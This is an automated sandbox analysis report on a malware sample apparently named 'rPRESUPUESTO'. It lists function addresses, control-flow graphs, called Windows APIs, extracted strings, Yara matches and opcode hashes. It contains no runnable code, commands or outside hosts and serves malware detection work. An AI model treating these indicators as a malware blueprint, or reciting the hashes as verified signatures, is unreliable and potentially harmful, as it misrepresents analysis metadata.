                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                                                • Instruction ID: 54c10105b04716dc5ac85bad8c0aed57fb5347fcacc74c9137f577b6d3274b23
                                                • Opcode Fuzzy Hash: b521ac98b6a3ac880985078c55c6cb4fa047887e037e4c485760f01774324154
                                                • Instruction Fuzzy Hash: 7E90023160551406D50171584515706104597D1301F65C411E5438568DCB958B9566A3
                                                Function 004141DB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 0041425A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: )bvl$07c402-5$07c402-5
                                                • API String ID: 1836367815-996227108
                                                • Opcode ID: d8aa882d647f5268c30fd1c78c96303e60bcb9a8bc33171214c54254062d28cc
                                                • Instruction ID: 7cb0f372ef88164581115421a1cd4eee5c090dfbcfdfeff10b8cff148b1f3543
                                                • Opcode Fuzzy Hash: d8aa882d647f5268c30fd1c78c96303e60bcb9a8bc33171214c54254062d28cc
                                                • Instruction Fuzzy Hash: 8D1102B2D0125C7AEB11AAD18C82DEF7B7CDF80398F448069FD00A7240D6784E4247F5
                                                Function 004140C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 16 4140c8-414135 17 414137 16->17 18 41415c-414162 16->18 17->18 19 414181-414185 18->19 20 414163-41417e 18->20 21 414187-4141a7 19->21 22 4141cf 19->22 20->19 21->20 23 4141a9-4141aa 21->23 24 4141d1-4141da 22->24 25 414232-41424d 22->25 28 4141f7-414231 call 42dfb3 call 417bb3 call 4048a3 call 4248f3 23->28 29 4141ac-4141af 23->29 26 41426d-414273 25->26 27 41424f-41425e PostThreadMessageW 25->27 27->26 30 414260-41426a 27->30 28->25 31 4141b2-4141b9 29->31 30->26 31->31 33 4141bb-4141cc 31->33 33->22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 0-1844765358
                                                • Opcode ID: fdf0240e6745b5eed38a101919f609dcd16858f600de99b47a4e80dd22b8a976
                                                • Instruction ID: 149ae14f2676c057c8877caf492b042c2eb623401663fb4c3d9565327f5db11d
                                                • Opcode Fuzzy Hash: fdf0240e6745b5eed38a101919f609dcd16858f600de99b47a4e80dd22b8a976
                                                • Instruction Fuzzy Hash: B341F273D492497BD7029FA8DC819DEBB78EFD1314B08429AE8549B242D339CD8387D5
                                                Function 004141E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 41 4141e3-414202 call 42d5a3 44 414208-41424d call 417bb3 call 4048a3 call 4248f3 41->44 45 414203 call 42dfb3 41->45 53 41426d-414273 44->53 54 41424f-41425e PostThreadMessageW 44->54 45->44 54->53 55 414260-41426a 54->55 55->53
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 0041425A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 1836367815-1844765358
                                                • Opcode ID: b1ec65bc22d4f7fd96de36f2e7793c8796d5397ff220ddd8ffc0aeef16c29bc4
                                                • Instruction ID: d2e21c5aabd2505fa775553f00fdb3f740febffd9e454fe4703a4cd51b74df20
                                                • Opcode Fuzzy Hash: b1ec65bc22d4f7fd96de36f2e7793c8796d5397ff220ddd8ffc0aeef16c29bc4
                                                • Instruction Fuzzy Hash: 220108B2D0115C7AEB00AAD18C81DEF7B7CDF80398F408069F90067240D57C4E4647F5
                                                Function 0042B973 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 70 42b973-42b9b4 call 404933 call 42c6d3 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B9AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: aiA
                                                • API String ID: 3298025750-61921773
                                                • Opcode ID: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction ID: 4cca70c05f9cbe06103fe4a0f8443e2fa92374340de6d0b84716e52d5f56089a
                                                • Opcode Fuzzy Hash: d8e14b4801b469f8c448accff43e4f25ba1102dc513a2ef6dbe5f4afabfd882a
                                                • Instruction Fuzzy Hash: 26E092B2200208BBC610EE59DC85FDB37ACDFC9714F004019FD08A7242D670B9118BB5
                                                Function 0042B923 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 65 42b923-42b964 call 404933 call 42c6d3 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000,?,00000000,aiA,?,004244CF), ref: 0042B95F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: aiA
                                                • API String ID: 1279760036-61921773
                                                • Opcode ID: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction ID: c15df0c3d5bc6c0424d339084049dda4fc6254e6d898e36fc7a111d8aa366236
                                                • Opcode Fuzzy Hash: 459a9e9d97f117b96781480ccda9a116c2493a52d9627519e06641746f610406
                                                • Instruction Fuzzy Hash: 41E092B2200204BBD610EF59EC41FDB37ADDFC9710F004029F908A7241DA70B9118BB4
                                                Function 0042B9C3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 42b9c3-42b9fc call 404933 call 42c6d3 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,90F25BD7,?,?,90F25BD7), ref: 0042B9F7
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_rPRESUPUESTO.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f94207f527ea87a61840077744958865a5fbbc3ef26220fc67fc4befdad32aec
                                                • Instruction ID: 664edad2cae747dec129f77787be34d0824e908f389dad7092f910b2453410d0
                                                • Opcode Fuzzy Hash: f94207f527ea87a61840077744958865a5fbbc3ef26220fc67fc4befdad32aec
                                                • Instruction Fuzzy Hash: 73E086716446147BC620EA5AEC41FDB776CDFC5714F004429FA0CA7181C6747A0187F4
                                                Function 01812C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 134 1812c0a-1812c0f 135 1812c11-1812c18 134->135 136 1812c1f-1812c26 LdrInitializeThunk 134->136
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                                                • Instruction ID: 9abed68a71e7f21ee72063e5296d6cea9277a80b7ede74f5c0e266b0cb339ce4
                                                • Opcode Fuzzy Hash: 6821069460c1346d77b167690b537749fbb404e49ead14cb2e7b36270e9c5721
                                                • Instruction Fuzzy Hash: 47B09B729015D5CADE12E7644609717794577D1701F25C061D3034641F4738C2D5E276

                                                Non-executed Functions

                                                Function 01852349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                                                • Instruction ID: e22d66a33724d25415eeb6b4c94da776908a07403dda96bc1602e299c3e829fd
                                                • Opcode Fuzzy Hash: 32e67eac29a86e69931b0fe6a706837c6202a154f993a8fd876c7ac888c63953
                                                • Instruction Fuzzy Hash: 83928B71604346EBE761CE28C884B6BB7EAFB84754F04482DFE94D7251DB70EA44CB92
                                                Function 01808620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • Critical section address, xrefs: 01845425, 018454BC, 01845534
                                                • undeleted critical section in freed memory, xrefs: 0184542B
                                                • Thread identifier, xrefs: 0184553A
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01845543
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0184540A, 01845496, 01845519
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454E2
                                                • double initialized or corrupted critical section, xrefs: 01845508
                                                • Invalid debug info address of this critical section, xrefs: 018454B6
                                                • Critical section address., xrefs: 01845502
                                                • 8, xrefs: 018452E3
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018454CE
                                                • corrupted critical section, xrefs: 018454C2
                                                • Critical section debug info address, xrefs: 0184541F, 0184552E
                                                • Address of the debug info found in the active list., xrefs: 018454AE, 018454FA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                                                • Instruction ID: ee40f0e787f32a41f7f3071e9a06d798941f657dec829e94d1d437be626d19ae
                                                • Opcode Fuzzy Hash: 6d5c65e63a404886b9ebe5d70ec052ae9ed3c8d2891c6f304a832a6d8a783a78
                                                • Instruction Fuzzy Hash: 05818BB1A01348EFDB60CF99C895BAEFBB9BB09B14F204119F504F7280D775AA40CB91
                                                Function 018029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01842506
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018424C0
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018425EB
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01842498
                                                • @, xrefs: 0184259B
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01842409
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018422E4
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0184261F
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01842412
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01842624
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01842602
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                                                • Instruction ID: 7d616b67dd7af230feeb6a64b3b024f8ee374f586bf80511db00f979bc79c603
                                                • Opcode Fuzzy Hash: 2b159785fe14f823caa6a284def5a938fde4603d30f08cafcc584dafe5bd37c8
                                                • Instruction Fuzzy Hash: 05025DF1D0422D9BDB61DB58CD84BEAB7B9AB54304F0041DAA609E7281EB709F84CF59
                                                Function 01878B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                                                • Instruction ID: 011302f9648a260cfa19288f14338b6a81cba12d8fe039db3016c9ee1c186708
                                                • Opcode Fuzzy Hash: a918722500ec22520117a1c1398d694cc7ace1b337a6b5db6883e61c1853d9df
                                                • Instruction Fuzzy Hash: 5B51BDB16083059BD329CF188848BABBBECFFD5754F544A2DAA99C3241E770D704CB92
                                                Function 01880274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                                                • Instruction ID: 7a2a7d2e63cd473f90a200084fec6757d5fba0857696dd771d0afb9099b92b54
                                                • Opcode Fuzzy Hash: 667bcadffc36d4355dc9d3717a412f76bf6db056306887a1b3a6b723a636a173
                                                • Instruction Fuzzy Hash: C2D1CF7160068ADFDB22EF68C455AA9FBF1FF49718F18805DF445EB252C7349A89CB20
                                                Function 018589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • AVRF: -*- final list of providers -*- , xrefs: 01858B8F
                                                • VerifierDlls, xrefs: 01858CBD
                                                • VerifierFlags, xrefs: 01858C50
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01858A3D
                                                • HandleTraces, xrefs: 01858C8F
                                                • VerifierDebug, xrefs: 01858CA5
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01858A67
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                                                • Instruction ID: 4a242e82d1f05851f208b1c472cc2d7a86edc68bc6d8f15e87f5ce46dbf43b1b
                                                • Opcode Fuzzy Hash: 7dd223d3d8e2f1e1d3269e6c184cd266b90e8940eb264cf22a030b3c4f925432
                                                • Instruction Fuzzy Hash: 2D91F3B1A01716DFDB62DF2E8880B5AB7E9EB55B14F05045EFE45EB241D730AF008B92
                                                Function 018063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                                                • Instruction ID: 39432629c7a31e51ea3777de6a29301aee13f7e86cb6d7edfee2f11f062a0b0e
                                                • Opcode Fuzzy Hash: 89a5727e7a8eb199de6d3b14ce549dd3379b8939b3293109bbcefebe63489278
                                                • Instruction Fuzzy Hash: AD911871B0171D9BEB26DF58DC84BAA7BA1BF50B18F250129EA00E72C5EB749701CB91
                                                Function 017C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01829A2A
                                                • apphelp.dll, xrefs: 017C6496
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01829A11, 01829A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01829A01
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018299ED
                                                • LdrpInitShimEngine, xrefs: 018299F4, 01829A07, 01829A30
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                                                • Instruction ID: 29ee7f0339040213db13e6546e45ed177dd144fce12f35bd836dda59cae4134a
                                                • Opcode Fuzzy Hash: c1c12f80b5578cb6ed599ee1f1afb59078339f055a17402aff2a85a8dcf3410a
                                                • Instruction Fuzzy Hash: 385104716083149FD721DF24D895FABB7E8FB84B48F10091EF98697265DB30EA44CB92
                                                Function 0180C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • Loading import redirection DLL: '%wZ', xrefs: 01848170
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180C6C3
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018481E5
                                                • LdrpInitializeProcess, xrefs: 0180C6C4
                                                • LdrpInitializeImportRedirection, xrefs: 01848177, 018481EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01848181, 018481F5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                                                • Instruction ID: 9b2608f52fdf11b4fa62074354100d5a6a8692400fdff31907caabd1b29e85c8
                                                • Opcode Fuzzy Hash: 9f25f0b83bdd5fae3c4303db6f91d1175cadb23b20b71472b531d497f3f0fa63
                                                • Instruction Fuzzy Hash: DC31F5B164474A9FC224EE68DD45E1AB794EF90B14F01055CF940AB295EB20EE04C7A2
                                                Function 01802674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018421BF
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0184219F
                                                • SXS: %s() passed the empty activation context, xrefs: 01842165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01842178
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01842180
                                                • RtlGetAssemblyStorageRoot, xrefs: 01842160, 0184219A, 018421BA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                                                • Instruction ID: bbe57067eed31e1326f86fc843e7bdd9ce301d5e1e3059e5a7a53363ce13a218
                                                • Opcode Fuzzy Hash: 539ba441eaf2a2284babf8e309719a7e3150dc15e3d28bcb7c9688b0ab9dc3f4
                                                • Instruction Fuzzy Hash: 8D312B76F4021D77F7229A999C85F9BBB7ADBA4B90F054059BB04F7180D7B0AB00C7A1
                                                Function 0181096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 01812DF0: LdrInitializeThunk.NTDLL ref: 01812DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01810D74
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                                                • Instruction ID: 725e59e3c5bd6e7008c813963255086403446b9e3602464233663258df519827
                                                • Opcode Fuzzy Hash: a8e97f5424a73a4358402485c98d4b0012f98d210e55f57069c330b7c2f4bed7
                                                • Instruction Fuzzy Hash: B4425F76900719DFDB21CF28C840BAAB7F9FF48314F1445A9E989DB245DB70AA84CF61
                                                Function 017DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                                                • Instruction ID: 90339fdb64d326b3ae54b9ec4297dbd961a07ccc7f9b9bfcf77ff1e75bb73c66
                                                • Opcode Fuzzy Hash: 951d0ac2a45e3ce64a67e8bee2b112ac3b893bdcfc8b123318e9bfe247643d30
                                                • Instruction Fuzzy Hash: 83C1697510838ACFD711CF58C044B6AB7F4BF84704F0489AAF996CB255E734DA4ACBA2
                                                Function 01808402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
